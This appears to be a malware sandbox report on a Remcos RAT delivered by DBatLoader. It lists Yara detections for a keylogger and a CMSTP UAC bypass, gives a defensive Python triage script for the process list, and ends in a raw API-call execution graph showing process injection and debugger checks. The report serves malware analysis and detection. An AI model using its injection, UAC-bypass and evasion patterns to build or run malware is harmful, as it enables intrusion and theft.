                                                                      File size:86'528 bytes
                                                                      MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:moderate
                                                                      Has exited:true
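The process records above carry the triage signals an analyst would pull out of a DBatLoader/Remcos run: a byte-identical copy of the submitted sample (same MD5) re-launched from C:\Users\Public\Libraries with a .PIF extension, GUI system utilities (SndVol.exe, colorcpl.exe) whose image path is SysWOW64 while their command line names System32 (WoW64 file-system redirection, i.e. a 32-bit parent created them), Yara hits on memory regions whose protection field is PAGE_EXECUTE_READWRITE, and a payload-carrying host that runs elevated after the CMSTP UAC-bypass rule fired. The script below is an added example, not Joe Sandbox code; its process table is constructed from the values printed on this page. It assumes that in the .sdmp source name the fourth dot-separated field is the region base address and the fifth its page protection (both hex), and it treats "Has elevated privileges" as the sandbox's own flag, which is why conhost.exe (elevated but with no Yara match) is not reported.

```python
"""Triage of the sandbox process list above (added example, constructed data)."""
import ntpath
from dataclasses import dataclass, field

SAMPLE_MD5 = "A27B6DE588AD4D4C0D6E0C656E580F4E"   # MD5 of the submitted sample (report header)
PAGE_EXECUTE_READWRITE = 0x40                     # winnt.h


@dataclass
class Proc:
    target_id: int
    path: str
    cmdline: str
    md5: str
    elevated: bool
    yara_sources: list[str] = field(default_factory=list)


# Values copied from the process records on this page.
PROCS = [
    Proc(8, r"C:\Windows\SysWOW64\SndVol.exe", r"C:\Windows\System32\SndVol.exe",
         "BD4A1CC3429ED1251E5185A72501839B", True,
         ["00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp",
          "00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp"]),
    Proc(9, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
         "0D698AF330FD17BEE3BF90011D49251D", True),
    Proc(10, r"C:\Users\Public\Libraries\Selebzih.PIF", r'"C:\Users\Public\Libraries\Selebzih.PIF"',
         "A27B6DE588AD4D4C0D6E0C656E580F4E", False),
    Proc(12, r"C:\Windows\SysWOW64\SndVol.exe", r"C:\Windows\System32\SndVol.exe",
         "BD4A1CC3429ED1251E5185A72501839B", False),
    Proc(13, r"C:\Users\Public\Libraries\Selebzih.PIF", r'"C:\Users\Public\Libraries\Selebzih.PIF"',
         "A27B6DE588AD4D4C0D6E0C656E580F4E", False),
    Proc(15, r"C:\Windows\SysWOW64\colorcpl.exe", r"C:\Windows\System32\colorcpl.exe",
         "DB71E132EBF1FEB6E93E8A2A0F0C903D", False,
         ["0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp",
          "0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp"]),
]


def cmdline_image(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)]
    return s.split(" ", 1)[0]


def self_copies(procs, sample_md5=SAMPLE_MD5):
    """Processes whose image is a byte-identical copy of the submitted sample
    running from the world-writable Public profile (the DBatLoader drop)."""
    return [p.target_id for p in procs
            if p.md5.upper() == sample_md5.upper()
            and p.path.lower().startswith(r"c:\users\public")]


def wow64_redirected(procs):
    """Image directory differs from the command-line directory: the child was
    created through WoW64 file-system redirection (a 32-bit parent asked for
    System32 and got SysWOW64). Weak alone; strong next to Yara hits."""
    return [p.target_id for p in procs
            if ntpath.dirname(p.path).lower()
            != ntpath.dirname(cmdline_image(p.cmdline)).lower()]


def rwx_yara_regions(procs):
    """Base address of every Yara-matched region whose protection field is
    PAGE_EXECUTE_READWRITE. Assumption: 4th dot-field = base, 5th = protection."""
    hits = {}
    for p in procs:
        for src in p.yara_sources:
            f = src.split(".")
            base, prot = int(f[3], 16), int(f[4], 16)
            if prot & PAGE_EXECUTE_READWRITE:
                hits.setdefault(p.target_id, []).append(base)
    return hits


def elevated_hosts_with_payload(procs):
    """System binaries that run elevated and carry a Yara-matched payload:
    the combination a successful UAC bypass produces."""
    return [p.target_id for p in procs if p.elevated and p.yara_sources]


def triage(procs=PROCS):
    return {
        "self_copies": self_copies(procs),
        "wow64_redirected": wow64_redirected(procs),
        "rwx_yara_regions": rwx_yara_regions(procs),
        "elevated_with_payload": elevated_hosts_with_payload(procs),
    }


if __name__ == "__main__":
    for name, result in triage().items():
        print(f"{name}: {result}")
```

Run as-is it reports Targets 10 and 13 as self-copies, 8, 12 and 15 as redirected hosts, RWX Yara regions in 8 and 15, and Target 8 as the elevated payload host; the same functions can be pointed at a process list exported from any other report of this format.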


                                                                        Execution Graph

                                                                        Execution Coverage:18.7%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:35%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:21
                                                                        execution_graph (node/edge dump of the interactive graph omitted; the Windows API calls named at graph nodes are listed by node address)
                                                                        2c52ee0: QueryPerformanceCounter
                                                                        2c54f26: SysAllocStringLen
                                                                        2c54c66: SysFreeString
                                                                        2c5babc: CharNextA
                                                                        2c67dd3: NtWriteVirtualMemory
                                                                        2c68204, 2c68215: GetModuleHandleA
                                                                        2c682bb: GetModuleHandleW, GetProcAddress, GetProcAddress
                                                                        2c68393: FlushInstructionCache
                                                                        2c683c1: FreeLibrary
                                                                        2c687e3: CreateProcessAsUserW
                                                                        2c688b8: LoadLibraryW
                                                                        2c6891f: FreeLibrary
                                                                        2c6894c: LoadLibraryW
                                                                        2c68973: GetProcAddress
                                                                        2c689b0: FreeLibrary
                                                                        2c6dcca: RtlDosPathNameToNtPathName_U
                                                                        2c6dce6: NtCreateFile
                                                                        2c6dd23: NtWriteFile, NtClose
                                                                        2c6dd5d: Sleep
                                                                        2c6ed69: WaitForSingleObject, CloseHandle, CloseHandle
                                                                        2c6f6e8: GetModuleHandleW
                                                                        2c6f744: GetModuleHandleW
                                                                        2c6f800: InetIsOffline
                                                                        2c74272: Sleep
2c7052f 35386->35388 35389 2c54530 11 API calls 35387->35389 35390 2c54860 11 API calls 35388->35390 35389->35388 35391 2c7066d 35390->35391 35392 2c70678 35391->35392 35393 2c547ec 11 API calls 35392->35393 35394 2c706a4 35393->35394 35395 2c706af 35394->35395 35396 2c689d0 20 API calls 35395->35396 35397 2c706c8 35396->35397 35398 2c54860 11 API calls 35397->35398 35399 2c706e9 35398->35399 35400 2c706f4 35399->35400 35401 2c547ec 11 API calls 35400->35401 35402 2c70720 35401->35402 35403 2c7072b 35402->35403 35404 2c689d0 20 API calls 35403->35404 35405 2c70744 35404->35405 37539 2c5c364 GetModuleFileNameA 35405->37539 35408 2c54530 11 API calls 35409 2c70761 35408->35409 35410 2c54a00 11 API calls 35409->35410 35411 2c70794 35410->35411 35412 2c54860 11 API calls 35411->35412 35413 2c707b5 35412->35413 35414 2c707cd 35413->35414 35415 2c547ec 11 API calls 35414->35415 35416 2c707ec 35415->35416 35417 2c70804 35416->35417 35418 2c689d0 20 API calls 35417->35418 35419 2c70810 35418->35419 35420 2c54860 11 API calls 35419->35420 35421 2c70831 35420->35421 35422 2c70849 35421->35422 35423 2c547ec 11 API calls 35422->35423 35424 2c70868 35423->35424 35425 2c546d4 35424->35425 35426 2c70880 35425->35426 35427 2c689d0 20 API calls 35426->35427 35428 2c7088c 35427->35428 35429 2c54860 11 API calls 35428->35429 35430 2c708ad 35429->35430 35431 2c708c5 35430->35431 35432 2c547ec 11 API calls 35431->35432 35433 2c708e4 35432->35433 35434 2c546d4 35433->35434 35435 2c708fc 35434->35435 35436 2c689d0 20 API calls 35435->35436 35437 2c70908 35436->35437 35438 2c54860 11 API calls 35437->35438 35439 2c70929 35438->35439 35440 2c70941 35439->35440 35441 2c547ec 11 API calls 35440->35441 35442 2c70960 35441->35442 35443 2c546d4 35442->35443 35444 2c70978 35443->35444 35445 2c689d0 20 API calls 35444->35445 35446 2c70984 35445->35446 35447 2c6e0f8 11 API calls 35446->35447 35448 2c70994 35447->35448 35449 2c54530 11 API calls 35448->35449 35450 2c709a4 35449->35450 35451 2c54860 
11 API calls 35450->35451 35452 2c709c5 35451->35452 35453 2c709d0 35452->35453 35454 2c547ec 11 API calls 35453->35454 35455 2c709fc 35454->35455 35456 2c70a07 35455->35456 35457 2c70a14 35456->35457 35458 2c689d0 20 API calls 35457->35458 35459 2c70a20 35458->35459 35460 2c54860 11 API calls 35459->35460 35461 2c70a41 35460->35461 35462 2c70a4c 35461->35462 35463 2c547ec 11 API calls 35462->35463 35464 2c70a78 35463->35464 35465 2c70a83 35464->35465 35466 2c70a90 35465->35466 35467 2c689d0 20 API calls 35466->35467 35468 2c70a9c 35467->35468 35469 2c54860 11 API calls 35468->35469 35470 2c70abd 35469->35470 35471 2c70ac8 35470->35471 35472 2c546d4 35471->35472 35473 2c70ad5 35472->35473 35474 2c547ec 11 API calls 35473->35474 35475 2c70af4 35474->35475 35476 2c70aff 35475->35476 35477 2c70b0c 35476->35477 35478 2c689d0 20 API calls 35477->35478 35479 2c70b18 35478->35479 35480 2c549a0 35479->35480 35481 2c70b22 35480->35481 35482 2c70b2f 35481->35482 35483 2c57e5c GetFileAttributesA 35482->35483 35484 2c70b3a 35483->35484 35485 2c70b42 35484->35485 35486 2c712fe 35484->35486 35487 2c54860 11 API calls 35485->35487 35488 2c54860 11 API calls 35486->35488 35489 2c70b63 35487->35489 35490 2c7131f 35488->35490 35492 2c70b7b 35489->35492 35491 2c71337 35490->35491 35493 2c547ec 11 API calls 35491->35493 35494 2c547ec 11 API calls 35492->35494 35495 2c71356 35493->35495 35496 2c70b9a 35494->35496 35497 2c71361 35495->35497 35498 2c70bb2 35496->35498 35499 2c689d0 20 API calls 35497->35499 35500 2c689d0 20 API calls 35498->35500 35501 2c7137a 35499->35501 35502 2c70bbe 35500->35502 35503 2c54860 11 API calls 35501->35503 35504 2c54860 11 API calls 35502->35504 35506 2c7139b 35503->35506 35505 2c70bdf 35504->35505 35507 2c70bf7 35505->35507 35508 2c713b3 35506->35508 35510 2c547ec 11 API calls 35507->35510 35509 2c547ec 11 API calls 35508->35509 35511 2c713d2 35509->35511 35512 2c70c16 35510->35512 35514 2c713dd 35511->35514 35513 2c70c2e 35512->35513 35516 2c689d0 20 
API calls 35513->35516 35515 2c689d0 20 API calls 35514->35515 35517 2c713f6 35515->35517 35518 2c70c3a 35516->35518 35519 2c54860 11 API calls 35517->35519 35520 2c54860 11 API calls 35518->35520 35521 2c71417 35519->35521 35522 2c70c5b 35520->35522 35525 2c71422 35521->35525 35523 2c549a0 35522->35523 35524 2c70c66 35523->35524 35526 2c547ec 11 API calls 35524->35526 35527 2c547ec 11 API calls 35525->35527 35529 2c70c92 35526->35529 35528 2c7144e 35527->35528 35530 2c549a0 35528->35530 35532 2c70c9d 35529->35532 35531 2c71459 35530->35531 35533 2c71466 35531->35533 35534 2c546d4 35532->35534 35536 2c689d0 20 API calls 35533->35536 35535 2c70caa 35534->35535 35537 2c689d0 20 API calls 35535->35537 35538 2c71472 35536->35538 35539 2c70cb6 35537->35539 37542 2c54de0 35538->37542 35541 2c54de0 35539->35541 35543 2c70cc7 35541->35543 38039 2c6dd70 35543->38039 35549 2c54530 11 API calls 35550 2c70ce8 35549->35550 35552 2c54860 11 API calls 35550->35552 35554 2c70d09 35552->35554 35556 2c70d14 35554->35556 35557 2c546d4 35556->35557 35559 2c70d21 35557->35559 35561 2c547ec 11 API calls 35559->35561 35563 2c70d40 35561->35563 35566 2c70d4b 35563->35566 35567 2c546d4 35566->35567 35568 2c70d58 35567->35568 35570 2c689d0 20 API calls 35568->35570 35572 2c70d64 35570->35572 35574 2c54860 11 API calls 35572->35574 35575 2c70d85 35574->35575 35577 2c70d90 35575->35577 35578 2c70d9d 35577->35578 35581 2c547ec 11 API calls 35578->35581 35583 2c70dbc 35581->35583 35586 2c70dc7 35583->35586 35588 2c546d4 35586->35588 35590 2c70dd4 35588->35590 35592 2c689d0 20 API calls 35590->35592 35594 2c70de0 35592->35594 35596 2c54860 11 API calls 35594->35596 35598 2c70e01 35596->35598 35600 2c549a0 35598->35600 35601 2c70e0c 35600->35601 35602 2c70e19 35601->35602 35604 2c547ec 11 API calls 35602->35604 35607 2c70e38 35604->35607 35608 2c549a0 35607->35608 35609 2c70e43 35608->35609 35611 2c546d4 35609->35611 35613 2c70e50 35611->35613 35615 2c689d0 20 API calls 35613->35615 35617 2c70e5c 
35615->35617 35619 2c6e24c 16 API calls 35617->35619 35621 2c70e71 35619->35621 35623 2c55818 13 API calls 35621->35623 35625 2c70e84 35623->35625 35627 2c54860 11 API calls 35625->35627 35628 2c70ea5 35627->35628 35630 2c546d4 35628->35630 35632 2c70ebd 35630->35632 35634 2c547ec 11 API calls 35632->35634 35636 2c70edc 35634->35636 35637 2c546d4 35636->35637 35639 2c70ef4 35637->35639 35641 2c689d0 20 API calls 35639->35641 35643 2c70f00 35641->35643 35645 2c54860 11 API calls 35643->35645 35646 2c70f21 35645->35646 35647 2c70f39 35646->35647 35649 2c547ec 11 API calls 35647->35649 35652 2c70f58 35649->35652 35653 2c70f70 35652->35653 35656 2c689d0 20 API calls 35653->35656 35658 2c70f7c 35656->35658 35660 2c54530 11 API calls 35658->35660 35661 2c70f8b 35660->35661 38054 2c6e1d4 35661->38054 35665 2c70f9d 35667 2c54860 11 API calls 35665->35667 35666 2c72ad8 35668 2c54860 11 API calls 35666->35668 35669 2c70fbe 35667->35669 35670 2c72af9 35668->35670 35674 2c70fc9 35669->35674 35672 2c72b04 35670->35672 35676 2c72b11 35672->35676 35675 2c70fd6 35674->35675 35679 2c547ec 11 API calls 35675->35679 35677 2c547ec 11 API calls 35676->35677 35680 2c72b30 35677->35680 35682 2c70ff5 35679->35682 35689 2c72b3b 35680->35689 35684 2c549a0 35682->35684 35686 2c71000 35684->35686 35688 2c546d4 35686->35688 35691 2c7100d 35688->35691 35692 2c689d0 20 API calls 35689->35692 35694 2c689d0 20 API calls 35691->35694 35695 2c72b54 35692->35695 35697 2c71019 35694->35697 35698 2c54860 11 API calls 35695->35698 35700 2c54860 11 API calls 35697->35700 35701 2c72b75 35698->35701 35703 2c7103a 35700->35703 35706 2c72b80 35701->35706 35705 2c71045 35703->35705 35708 2c71052 35705->35708 35709 2c72b8d 35706->35709 35712 2c547ec 11 API calls 35708->35712 35713 2c547ec 11 API calls 35709->35713 35716 2c71071 35712->35716 35714 2c72bac 35713->35714 35718 2c72bb7 35714->35718 35720 2c7107c 35716->35720 35724 2c689d0 20 API calls 35718->35724 35722 2c71089 35720->35722 35726 2c689d0 20 API 
calls 35722->35726 35727 2c72bd0 35724->35727 35729 2c71095 35726->35729 35730 2c54860 11 API calls 35727->35730 35732 2c54860 11 API calls 35729->35732 35733 2c72bf1 35730->35733 35735 2c710b6 35732->35735 35738 2c546d4 35733->35738 35737 2c710c1 35735->35737 35741 2c547ec 11 API calls 35737->35741 35739 2c72c09 35738->35739 35742 2c547ec 11 API calls 35739->35742 35744 2c710ed 35741->35744 35745 2c72c28 35742->35745 35749 2c710f8 35744->35749 35747 2c72c33 35745->35747 35752 2c72c40 35747->35752 35751 2c71105 35749->35751 35756 2c689d0 20 API calls 35751->35756 35754 2c689d0 20 API calls 35752->35754 35757 2c72c4c 35754->35757 35759 2c71111 35756->35759 35760 2c54860 11 API calls 35757->35760 35762 2c54860 11 API calls 35759->35762 35763 2c72c6d 35760->35763 35765 2c71132 35762->35765 35768 2c72c78 35763->35768 35767 2c549a0 35765->35767 35770 2c7113d 35767->35770 35772 2c547ec 11 API calls 35768->35772 35771 2c547ec 11 API calls 35770->35771 35773 2c71169 35771->35773 35774 2c72ca4 35772->35774 35776 2c549a0 35773->35776 35779 2c72caf 35774->35779 35778 2c71174 35776->35778 35781 2c71181 35778->35781 35783 2c689d0 20 API calls 35779->35783 35784 2c689d0 20 API calls 35781->35784 35785 2c72cc8 35783->35785 35786 2c7118d 35784->35786 35785->35184 35789 2c72ced 35785->35789 35788 2c54860 11 API calls 35786->35788 35791 2c711ae 35788->35791 35792 2c54860 11 API calls 35789->35792 35794 2c549a0 35791->35794 35797 2c72d0e 35792->35797 35796 2c711b9 35794->35796 35798 2c547ec 11 API calls 35796->35798 35799 2c72d26 35797->35799 35801 2c711e5 35798->35801 35803 2c547ec 11 API calls 35799->35803 35802 2c549a0 35801->35802 35805 2c711f0 35802->35805 35806 2c72d45 35803->35806 35808 2c711fd 35805->35808 35809 2c72d50 35806->35809 35811 2c689d0 20 API calls 35808->35811 35812 2c72d5d 35809->35812 35813 2c71209 35811->35813 35814 2c689d0 20 API calls 35812->35814 35816 2c549a0 35813->35816 35817 2c72d69 35814->35817 35819 2c71213 35816->35819 35820 2c54860 11 API calls 
35817->35820 38060 2c54d74 35819->38060 35829 2c72d8a 35820->35829 35834 2c547ec 11 API calls 35829->35834 35840 2c72dc1 35834->35840 35842 2c689d0 20 API calls 35840->35842 35845 2c72de5 35842->35845 35848 2c54860 11 API calls 35845->35848 35852 2c72e06 35848->35852 35855 2c72e1e 35852->35855 35858 2c547ec 11 API calls 35855->35858 35862 2c72e3d 35858->35862 35863 2c72e55 35862->35863 35864 2c689d0 20 API calls 35863->35864 35866 2c72e61 35864->35866 35868 2c54860 11 API calls 35866->35868 35869 2c72e82 35868->35869 35871 2c72e8d 35869->35871 35874 2c547ec 11 API calls 35871->35874 35876 2c72eb9 35874->35876 35878 2c72ec4 35876->35878 35880 2c689d0 20 API calls 35878->35880 35882 2c72edd 35880->35882 37544 2c57acc 35882->37544 35891 2c54530 11 API calls 35893 2c72f09 35891->35893 35895 2c54860 11 API calls 35893->35895 35897 2c72f2a 35895->35897 35900 2c72f35 35897->35900 35903 2c547ec 11 API calls 35900->35903 35905 2c72f61 35903->35905 35908 2c72f6c 35905->35908 35910 2c72f79 35908->35910 35911 2c689d0 20 API calls 35910->35911 35913 2c72f85 35911->35913 35915 2c54860 11 API calls 35913->35915 35917 2c72fa6 35915->35917 35919 2c72fb1 35917->35919 35920 2c72fbe 35919->35920 35922 2c547ec 11 API calls 35920->35922 35924 2c72fdd 35922->35924 35926 2c72fe8 35924->35926 35929 2c72ff5 35926->35929 35930 2c689d0 20 API calls 35929->35930 35932 2c73001 35930->35932 37557 2c6f108 35932->37557 35938 2c54530 11 API calls 35940 2c73021 35938->35940 35942 2c54860 11 API calls 35940->35942 35944 2c73042 35942->35944 35947 2c7304d 35944->35947 35949 2c7305a 35947->35949 35951 2c547ec 11 API calls 35949->35951 35954 2c73079 35951->35954 35955 2c73091 35954->35955 35957 2c689d0 20 API calls 35955->35957 35959 2c7309d 35957->35959 35961 2c54860 11 API calls 35959->35961 35963 2c730be 35961->35963 35965 2c730c9 35963->35965 35966 2c730d6 35965->35966 35968 2c547ec 11 API calls 35966->35968 35973 2c730f5 35968->35973 35976 2c689d0 20 API calls 35973->35976 35978 2c73119 
35976->35978 35980 2c54860 11 API calls 35978->35980 35983 2c7313a 35980->35983 35984 2c73152 35983->35984 35986 2c547ec 11 API calls 35984->35986 35988 2c73171 35986->35988 35990 2c7317c 35988->35990 35991 2c73189 35990->35991 35993 2c689d0 20 API calls 35991->35993 35995 2c73195 35993->35995 35997 2c731a6 35995->35997 37562 2c6e24c 35997->37562 36004 2c54860 11 API calls 36005 2c731f0 36004->36005 36007 2c731fb 36005->36007 36008 2c73208 36007->36008 36010 2c547ec 11 API calls 36008->36010 36012 2c73227 36010->36012 36015 2c73232 36012->36015 36017 2c7323f 36015->36017 36018 2c689d0 20 API calls 36017->36018 36019 2c7324b 36018->36019 36021 2c54860 11 API calls 36019->36021 36023 2c7326c 36021->36023 36025 2c73277 36023->36025 36027 2c547ec 11 API calls 36025->36027 36029 2c732a3 36027->36029 36032 2c732ae 36029->36032 36035 2c689d0 20 API calls 36032->36035 36036 2c732c7 36035->36036 36038 2c54860 11 API calls 36036->36038 36042 2c732e8 36038->36042 36044 2c547ec 11 API calls 36042->36044 36049 2c7331f 36044->36049 36051 2c689d0 20 API calls 36049->36051 36052 2c73343 36051->36052 36054 2c54860 11 API calls 36052->36054 36057 2c73364 36054->36057 36058 2c7337c 36057->36058 36060 2c547ec 11 API calls 36058->36060 36064 2c7339b 36060->36064 36065 2c733b3 36064->36065 36067 2c689d0 20 API calls 36065->36067 36068 2c733bf 36067->36068 36069 2c54530 11 API calls 36068->36069 36071 2c733ce 36069->36071 36072 2c54530 11 API calls 36071->36072 36074 2c733dd 36072->36074 36076 2c54530 11 API calls 36074->36076 36077 2c733ec 36076->36077 36078 2c54530 11 API calls 36077->36078 36080 2c733fb 36078->36080 36082 2c54530 11 API calls 36080->36082 36083 2c7340a 36082->36083 36085 2c54530 11 API calls 36083->36085 36087 2c73419 36085->36087 36088 2c54530 11 API calls 36087->36088 36090 2c73428 36088->36090 36091 2c54530 11 API calls 36090->36091 37513 2c52eed 37512->37513 37514 2c52ef8 GetTickCount 37512->37514 37513->35107 37514->35107 37516 2c6f711 37515->37516 37517 2c6f6fa 
GetProcAddress 37515->37517 37516->35182 37518 2c6f709 37517->37518 37518->35182 37520 2c6f760 GetProcAddress 37519->37520 37521 2c6f786 37519->37521 37520->37521 37522 2c6f774 CheckRemoteDebuggerPresent 37520->37522 37521->35184 37521->35187 37522->37521 37524 2c549a4 37523->37524 37524->35206 37532 2c6e114 37525->37532 37526 2c6e197 37527 2c544dc 11 API calls 37526->37527 37528 2c6e19f 37527->37528 37530 2c54530 11 API calls 37528->37530 37529 2c549f8 11 API calls 37529->37532 37531 2c6e1aa 37530->37531 37533 2c54500 11 API calls 37531->37533 37532->37526 37532->37529 37534 2c6e1c4 37533->37534 37534->35327 37536 2c549a0 37535->37536 37537 2c57e66 GetFileAttributesA 37536->37537 37538 2c57e71 37537->37538 37538->35349 37538->35350 37540 2c545cc 11 API calls 37539->37540 37541 2c5c38b 37540->37541 37541->35408 37543 2c54de6 37542->37543 37545 2c57adc 37544->37545 37546 2c57afd 37545->37546 38085 2c57660 42 API calls 37545->38085 37548 2c6f16c 37546->37548 37549 2c6f189 37548->37549 37550 2c6f1e7 37549->37550 38086 2c546c4 11 API calls 37549->38086 38087 2c54530 11 API calls 37549->38087 37552 2c544dc 11 API calls 37550->37552 37553 2c6f1fc 37552->37553 37555 2c544dc 11 API calls 37553->37555 37556 2c6f204 37555->37556 37556->35891 37558 2c54530 11 API calls 37557->37558 37560 2c6f11c 37558->37560 37559 2c6f163 37559->35938 37560->37559 37561 2c549f8 11 API calls 37560->37561 37561->37560 37563 2c6e265 37562->37563 37564 2c54530 11 API calls 37563->37564 37565 2c6e291 37564->37565 38088 2c557d0 37565->38088 37567 2c6e2d1 37568 2c54530 11 API calls 37567->37568 37570 2c6e2e3 37568->37570 37569 2c54a00 11 API calls 37571 2c6e2b5 37569->37571 37573 2c54500 11 API calls 37570->37573 37571->37567 37571->37569 37571->37570 38091 2c54a40 11 API calls 37571->38091 37574 2c6e348 37573->37574 37575 2c55818 37574->37575 37576 2c5581f 37575->37576 37577 2c55839 37576->37577 38115 2c557dc 13 API calls 37576->38115 37577->36004 38040 2c54f20 SysAllocStringLen 38039->38040 38041 
2c6dd85 38040->38041 38042 2c544dc 11 API calls 38041->38042 38043 2c6dd9a 38042->38043 38044 2c6ddaa RtlDosPathNameToNtPathName_U 38043->38044 38202 2c6dbdc 38044->38202 38046 2c6ddc6 NtOpenFile NtQueryInformationFile 38047 2c54bcc 11 API calls 38046->38047 38048 2c6de01 38047->38048 38049 2c549f8 11 API calls 38048->38049 38050 2c6de0d NtReadFile NtClose 38049->38050 38051 2c6de37 38050->38051 38052 2c54c60 SysFreeString 38051->38052 38053 2c6de3f 38052->38053 38053->35549 38055 2c6e1e6 38054->38055 38203 2c58d94 38055->38203 38058 2c544dc 11 API calls 38059 2c6e239 38058->38059 38059->35665 38059->35666 38061 2c54d7a 38060->38061 38085->37546 38086->37549 38087->37549 38092 2c55644 38088->38092 38091->37571 38093 2c55663 38092->38093 38098 2c5567d 38092->38098 38094 2c5566e 38093->38094 38109 2c52cf4 11 API calls 38093->38109 38110 2c5563c 13 API calls 38094->38110 38097 2c55678 38097->37571 38099 2c556c6 38098->38099 38111 2c52cf4 11 API calls 38098->38111 38101 2c556d3 38099->38101 38102 2c55708 38099->38102 38112 2c52c44 11 API calls 38101->38112 38113 2c52c10 11 API calls 38102->38113 38105 2c55703 38105->38097 38108 2c55644 16 API calls 38105->38108 38106 2c55712 38106->38105 38114 2c55624 16 API calls 38106->38114 38108->38105 38109->38094 38110->38097 38111->38099 38112->38105 38113->38106 38114->38105 38115->37577 38202->38046 38204 2c58da1 38203->38204 38205 2c58dc7 38204->38205 38207 2c57660 42 API calls 38204->38207 38205->38058 38207->38205 38209 2c54edc 38210 2c54ee9 38209->38210 38214 2c54ef0 38209->38214 38215 2c54c38 38210->38215 38221 2c54c50 38214->38221 38216 2c54c4c 38215->38216 38217 2c54c3c SysAllocStringLen 38215->38217 38216->38214 38217->38216 38218 2c54c30 38217->38218 38219 2c54f26 SysAllocStringLen 38218->38219 38220 2c54f3c 38218->38220 38219->38218 38219->38220 38220->38214 38222 2c54c56 SysFreeString 38221->38222 38223 2c54c5c 38221->38223 38222->38223 38224 2c51c6c 38225 2c51d04 38224->38225 38226 2c51c7c 38224->38226 38229 
2c51d0d 38225->38229 38230 2c51f58 38225->38230 38227 2c51cc0 38226->38227 38228 2c51c89 38226->38228 38234 2c51724 10 API calls 38227->38234 38231 2c51c94 38228->38231 38272 2c51724 38228->38272 38233 2c51d25 38229->38233 38246 2c51e24 38229->38246 38232 2c51fec 38230->38232 38236 2c51fac 38230->38236 38237 2c51f68 38230->38237 38239 2c51d2c 38233->38239 38243 2c51d48 38233->38243 38248 2c51dfc 38233->38248 38255 2c51cd7 38234->38255 38240 2c51fb2 38236->38240 38244 2c51724 10 API calls 38236->38244 38241 2c51724 10 API calls 38237->38241 38238 2c51e7c 38242 2c51724 10 API calls 38238->38242 38262 2c51e95 38238->38262 38245 2c51f82 38241->38245 38247 2c51f2c 38242->38247 38252 2c51d79 Sleep 38243->38252 38257 2c51d9c 38243->38257 38249 2c51fc1 38244->38249 38266 2c51a8c 8 API calls 38245->38266 38270 2c51fa7 38245->38270 38246->38238 38251 2c51e55 Sleep 38246->38251 38246->38262 38247->38262 38265 2c51a8c 8 API calls 38247->38265 38250 2c51724 10 API calls 38248->38250 38267 2c51a8c 8 API calls 38249->38267 38249->38270 38260 2c51e05 38250->38260 38251->38238 38256 2c51e6f Sleep 38251->38256 38253 2c51d91 Sleep 38252->38253 38252->38257 38253->38243 38254 2c51ca1 38263 2c51cb9 38254->38263 38296 2c51a8c 38254->38296 38261 2c51a8c 8 API calls 38255->38261 38264 2c51cfd 38255->38264 38256->38246 38259 2c51e1d 38260->38259 38269 2c51a8c 8 API calls 38260->38269 38261->38264 38268 2c51f50 38265->38268 38266->38270 38271 2c51fe4 38267->38271 38269->38259 38273 2c5173c 38272->38273 38274 2c51968 38272->38274 38285 2c517cb Sleep 38273->38285 38287 2c5174e 38273->38287 38275 2c51a80 38274->38275 38276 2c51938 38274->38276 38278 2c51684 VirtualAlloc 38275->38278 38279 2c51a89 38275->38279 38280 2c51947 Sleep 38276->38280 38289 2c51986 38276->38289 38277 2c5175d 38277->38254 38281 